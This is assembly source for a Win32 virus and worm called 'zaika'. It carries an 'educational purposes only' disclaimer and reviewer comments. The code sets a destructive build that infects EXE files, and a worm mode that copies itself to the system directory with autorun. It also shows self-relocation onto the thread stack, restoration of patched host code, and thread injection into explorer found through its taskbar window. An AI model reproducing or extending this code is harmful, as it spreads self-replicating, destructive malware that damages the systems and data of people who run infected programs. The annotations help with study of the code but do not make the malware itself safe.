;============================zaika==============================;
;    This source is for educational purposes only. The author does not take	;
;            responsibility for the consequences of its usage.				;
;					This is an open-source program.							;
.586				; 32-bit instruction set (TASM, MASM-mode syntax)
locals 			; enable @@-style local labels
jumps			; TASM may widen out-of-range conditional jumps; all offsets here are label-relative, so sizes stay consistent
.model flat, stdcall	; flat 32-bit model; Win32 APIs are stdcall (callee cleans the stack)


DEBUG equ 0			; debug console (1 = also load msvcrt/sprintf in the IF DEBUG block at _stack_exec1)
RELEASE	equ 1	; NOTE(review): as checked in (RELEASE=1, NORELEASE=0) the comment below
NORELEASE	equ 0	; says this is the destructive, *.EXE-infecting build. The switches are consumed by code outside this excerpt.
;RELEASE=0 NORELEASE=1 - 	destruction off, infecting *.MZD, 
;					beep at infection
;RELEASE=1 NORELEASE=0 - 	destruction on,  infecting *.EXE

; callW f -- call a Win32 API through an ordinary linker import (extrn).
; Only the dropper stub at start: uses it, because only the linked EXE has an
; import table; the relocatable body below uses xcall (presumably from
; eaxapi1.inc) with addresses resolved at run time by get_kernel/get_apis.
callW macro f
extrn f:proc
	call f
endm

include windows.inc
include consts.inc
include pestruct.inc
include structs.inc
include eaxapi1.inc ;definitions of macro
MB_TOPMOST	equ 40000h

.data
; Dropper entry point of the linked EXE.  The entry point and the whole virus
; body below are placed in the writable .data section, so this relies on that
; section being executable at run time (no DEP/NX, or the linker marking .data
; executable) -- TODO confirm for the build in use.
start:

	mov 1 ptr [dropper], 1		; "running as dropper" byte flag (defined outside this excerpt; '1 ptr' = TASM byte-size override)
	lea eax, [_start]		; thread entry = virus body
	push esp esp 0 0 eax 10000h 0	; TASM multi-push, left to right: scratch dword for lpThreadId, its address,
					; then dwCreationFlags=0, lpParameter=0, lpStartAddress=eax, dwStackSize=10000h, lpThreadAttributes=0
	callW CreateThread		; run the body on its own thread
	pop ecx				; discard the scratch lpThreadId slot (CreateThread popped its 6 args)

	
_exit:
	push 30000
	callW Sleep			; keep the process alive 30 s so the worker threads can finish
	push 0
	callW ExitProcess		; _exit is also what retaddr (below) points at in the dropper build


;org 100h
db ".beg."			; marker: first byte of the relocatable image (virstart)
virstart:
_realstart:
	;  after decryption execution gets here
_start:
	; Delta-offset trick: the body may run at any address (host image, stack
	; copy, remote process), so every reference below is [ebp+label-rec].
	call recalc
recalc:
rec	db 5Dh ; pop ebp -- emitted as data so 'rec' is a plain symbol usable in offset expressions; ebp = &rec

	call get_kernel			; locate kernel32 (not shown)
	push kernel32_api_num
	pop ecx				; ecx = number of kernel32 entries to resolve
__Kernel32 equ _LoadLibraryA-5
	lea esi, [ebp+__Kernel32-rec]	; esi -> API table starting 5 bytes before _LoadLibraryA (table layout not shown)
	call get_apis ; get kernel32 apis

	lea eax, [ebp+thread1-rec]
	push esp esp 0 0 eax 10000h 0	; same scratch-slot pattern as in start: (slot for lpThreadId, then its address, then the other 5 args)
	xcall CreateThread		; spawn thread1 (relocates itself to its stack via copy_to_stack, then continues at _stack_exec1)
	pop ecx				; drop the scratch slot


	; if worm, copy to sysdir, set autorun & exit
	cmp 1 ptr [ebp+worm-rec], 0	; worm-mode byte flag (defined outside this excerpt)
	jz __5687
	call worm_startup		; not shown; per the comment above it copies to the system dir and sets autorun
	push 3000
	xcall Sleep
	push 0
	xcall ExitProcess		; worm mode never returns to a host
__5687:


	; restore host program if not dropper
	; Put the host's original bytes back over the two patch sites the
	; infector overwrote.  Both sites are first made writable with
	; VirtualProtect(PAGE_READWRITE); the old protection is never restored,
	; and PAGE_READWRITE drops EXECUTE, so on a DEP-enforcing system the
	; restored host code would fault once control returns to it.
	cmp 1 ptr [ebp+dropper-rec], 0
	jnz __567			; dropper: nothing was patched
	lea ebx, [ebp+replace-rec]	; record of the first patch site (fields to_rva / sizeinbytes, struct defined elsewhere)
	mov edi, [ebx].to_rva		; NOTE(review): named "rva" but used directly as an absolute VA below -- confirm the infector stores a VA
	lea esi, [ebp+backup-rec]	; saved original bytes
	mov ecx, [ebx].sizeinbytes
	pushad
	push esp			; scratch dword for lpflOldProtect
	push esp			; &scratch
	push PAGE_READWRITE
	push ecx			; size
	push edi			; address
	xcall VirtualProtect		; result discarded (popad below); if it failed, the movsb writes a read-only page and faults
	pop eax				; drop scratch
	popad
	rep movsb			; restore the host bytes
	; restore jmp
	cmp 1 ptr [ebp+isjmp-rec], 0	; second patch site (a jmp) present?
	jz __567

	lea ebx, [ebp+jmpreplace-rec]
	mov edi, [ebx].to_rva		; same caveat as above
	lea esi, [ebp+jmpbackup-rec]
	mov ecx, jmpsize		; fixed size constant (defined elsewhere)
	pushad
	push esp			; scratch dword for lpflOldProtect
	push esp
	push PAGE_READWRITE
	push ecx
	push edi
	xcall VirtualProtect		; result discarded, as above
	pop eax
	popad
	rep movsb

__567:
	

_out:
	cmp 1 ptr [ebp+dropper-rec], 0
	jz __return_to_host
	; exit thread if dropper
	push 0
	xcall ExitThread		; dropper: _start ran as a worker thread (see start:), so just end it
__return_to_host:
	; return to host if not dropper
	; Build a relative jmp to retaddr: disp32 = target - (address of the byte after the jmp).
	; This patches the virus body itself (self-modifying code): the page holding
	; __jmp_addr must be writable here -- the VirtualProtect calls above only touch
	; the host's bytes, not this one; presumably the infector's section flags allow it.
	lea eax, [ebp+__jmp_addr+4-rec]	; runtime address just past the jmp instruction
	mov ecx, [ebp+retaddr-rec]	; absolute address at which to resume the host
	sub ecx, eax
	mov [ebp+__jmp_addr-rec], ecx
	popad				; NOTE(review): no matching pushad in this excerpt; presumably done by the entry stub written into the host
	db 0E9h	; jmp rel32 (near jump, despite the old "far" remark); displacement patched just above
__jmp_addr	dd ?
	nop

retaddr	dd offset _exit;401000h	; host resume address; linked to _exit in the dropper build, presumably patched by the infector

; macro
; copy_to_stack thread1, _stack_exec1
;   Thread-entry prologue that copies the whole image (virstart .. virstart+virsize)
;   onto the current thread's stack and re-enters itself there, so the thread
;   survives once the original image (host section / other thread's stack) is gone.
;   On arrival at _stack_exec1: ebp = &rec inside the executing copy, esp = base of
;   that copy (= &virstart).  Clobbers eax, ecx, esi, edi.
;   Caveat: this runs code from the stack, which requires an executable stack
;   (i.e. no DEP/NX enforcement).
copy_to_stack	macro thread1, _stack_exec1
local ddx
local begin
thread1:
begin:
	call ddx
ddx:
	pop ebp
	sub ebp, (ddx-recalc)		; ebp = &rec in whichever copy is running (recalc and rec share an address)
	mov eax, ebp
	sub eax, esp
	cmp eax, (recalc-virstart); test if we are in stack -- holds iff esp == &virstart, i.e. esp is the copy base set up below
	jz _stack_exec1
	; not in stack
	; copy ourselves to stack
	sub esp, virsize		; virsize = image size, defined outside this excerpt
	and esp, -4 ; align esp to 4 
	mov edi, esp
	lea esi, [ebp+virstart-rec]
	mov ecx, virsize
	rep movsb
	lea eax, [esp+(thread1-virstart)]
	jmp eax				; re-enter at thread1 inside the copy; the check above then succeeds
endm

	copy_to_stack thread1, _stack_exec1	; thread1 entry: relocate to this thread's stack (see macro above)

_stack_exec1:
	sub esp, 500h			; reserve locals below the stack copy; they are addressed as ebp-N (see "stack variables" below)

;	mov 1 ptr [ebp+worm-rec], 0		; clear worm flag
	call loaddll2			; not shown; presumably resolves further DLL imports

IF DEBUG EQ 1
__msvcrt	equ	_sprintf-5
	lea eax, [ebp+_msvcrt-rec]	; DLL name string (defined elsewhere)
	push eax
	xcall LoadLibraryA
	mov [ebp+_Default-rec], eax	; module handle; presumably the module get_apis resolves against
	lea esi, [ebp+__msvcrt-rec]	; msvcrt API table, same "5 bytes before the first entry" layout as __Kernel32
	push msvcrt_api_num
	pop ecx
	call get_apis
ENDIF

;)	
; Single-instance gate: if another copy already holds the named mutex, block
; until it is released, then continue.  (Creation of the mutex is not in this excerpt.)
openm:
	lea eax, [ebp+mutexname-rec]	; mutex name string (defined elsewhere; cf. __mutex_name)
	push eax
	push 1				; bInheritHandle = TRUE
	push 1f0001h	; MUTEX_ALL_ACCESS
	xcall OpenMutex

	; wait for release of mutex
	mov 4 ptr [ebp+hmutex-rec], eax	; '4 ptr' = TASM dword-size override
	test eax, eax
	jz processing			; no other instance -> continue immediately
	push -1				; INFINITE
	push eax
	xcall WaitForSingleObject	; result (WAIT_OBJECT_0 / WAIT_ABANDONED / WAIT_FAILED) is not checked

	; mutex is released

processing:
	sub eax, eax
	mov 1 ptr [ebp+isseh-rec], al	; isseh = 0 (flag consumed outside this excerpt)

;	jmp run_local_thread
	; let us go

	; look for explorer
	; Build "Shell_TrayWnd\0" on the stack as 4 dwords ('d' pushes "d\0\0\0") and
	; locate the taskbar window; its owner process is the injection target.
	push 'd'
	push 'nWya'
	push 'rT_l'
	push 'lehS' ;Shell_TrayWnd
	mov eax, esp
	push 0
	push eax
	xcall FindWindowA
	or eax, eax
	jz foregr_win	; (was: exit_thread1) NOTE(review): this path skips the 'add esp, 16' below, so the 16-byte name buffer is never popped; harmless only because the thread ends in ExitThread
	mov esi, eax			; esi = taskbar hwnd
	add esp, 16			; drop the name buffer
	jmp cy1
	; if no explorer, get topmost window
foregr_win:
	xcall GetForegroundWindow
	mov esi, eax			; esi = foreground hwnd (may be 0)

cy1:
	push eax			; scratch dword for lpdwProcessId
	push esp			; &scratch
	push eax			; hWnd
	xcall GetWindowThreadProcessId
	pop edx				; edx = owning process id
	or eax, eax
	jz exit_thread1			; no owning thread (invalid hwnd)
	mov edi, eax			; edi = owning thread id


;efork(pid, paddr, icaddr, ofs, ics, hwnd, thid)
	; Try to start thread2 inside the window's owner process.  efork is not
	; shown; arguments are pushed right-to-left in the order of the comment.
	; No caller-side stack cleanup follows: either efork pops its 7 args or
	; the slots are abandoned (the thread exits shortly either way).
	push edi			; thid
	push esi			; hwnd
	push virsize+1			; ics  = bytes to inject (whole image + 1)
	push (thread2-virstart)		; ofs  = offset of the thread2 entry within the image
	lea eax, [ebp+virstart-rec]
	push eax			; icaddr = image to inject
	push 0 				; paddr
	push edx			; pid
	call efork
	or eax, eax
	jnz exit_thread1		; nonzero = efork succeeded (per the fallback comment below); this thread is done

	; run local thread if we can not run remote one
run_local_thread:
	lea eax, [ebp+thread2-rec]
	push esp esp 0 0 eax 10000h 0	; same scratch-slot pattern as the other CreateThread calls
	xcall CreateThread		; fall back to running thread2 in this process
	pop ecx

exit_thread1:
	; thread2 (if started above) has its entry inside THIS thread's stack copy;
	; give it time to relocate itself (presumably via copy_to_stack as well)
	; before this stack is released by ExitThread.


	push 200
	xcall Sleep	; wait while thread copies itself to stack
	push 0
	xcall ExitThread	; exit

__mutex_name 	equ "fg", 0	; text equate with the mutex name bytes; the db that emits it is not in this excerpt
__hmap 	db 0			; byte placeholder; not referenced in this excerpt (distinct from the hmap equate below)

; stack variables
; Per-thread locals addressed relative to ebp.  In this body ebp is the delta
; base (&rec, see recalc), not a frame pointer, so when running from the stack
; copy these ebp-N slots fall inside the 500h bytes reserved by 'sub esp, 500h'
; at _stack_exec1 (valuessize = 400h of them).  The slots are used by code
; outside this excerpt; the purposes noted here come from the names only.

valuessize 	equ 400h ; local stack values size
; variables begin at ebp-8
_thid	equ ebp-08h			; thread id
_hwnd	equ ebp-0Ch			; window handle
fdata 	equ ebp-4 ptr 150h		; the 140h bytes between here and _hwnd equal sizeof(WIN32_FIND_DATAA); presumably the find buffer (cf. hfind) -- confirm
ahand		equ ebp-4 ptr 154h	
hmap		equ ebp-4 ptr 158h	; NOTE(review): hmap is redefined below (180h); every reference assembled after that line gets the later slot, so this one is shadowed -- verify which is intended
fbase		equ ebp-4 ptr 15Ch
rvaalloc 	equ ebp-4 ptr 160h
i		equ ebp-4 ptr 164h
fsize		equ ebp-4 ptr 168h
newfsize	equ ebp-4 ptr 16Ch
fpos		equ ebp-4 ptr 170h
rvapos	equ ebp-4 ptr 174h
loaderbuf	equ ebp-4 ptr 178h	; pointer to loader buffer 
virbuf	equ ebp-4 ptr 17Ch	; pointer to virus buffer 
hmap		equ ebp-4 ptr 180h	; second definition of hmap (see note above)
tbl	equ ebp-4 ptr 184h
jmpofs	equ ebp-4 ptr 188h
injofs	equ ebp-4 ptr 18Ch
loaderphysaddr 	equ ebp-4 ptr 190h
newimagesize 	equ ebp-4 ptr 194h
newsectionvirtsize	equ ebp-4 ptr 198h
newsectionphyssize	equ ebp-4 ptr 19Ch
diffaddr	equ ebp-4 ptr 1A0h
codesegphysaddr	equ ebp-4 ptr 1A4h
enchash	equ ebp-4 ptr 1ACh		; 	hash [8 bytes] (1ACh..1A5h, i.e. the gap down to codesegphysaddr)
hfind equ ebp-4 ptr 1B0h		; find handle (cf. fdata)
tempdir	equ ebp-1 ptr 2B0h		; 100h-byte buffer (2B0h..1B1h)
tempdirl	equ ebp-1 ptr 3B0h	; 100h-byte buffer (3B0h..2B1h)
success	equ ebp-4 ptr 3B4h	; last slot; 3B4h < valuessize (400h)
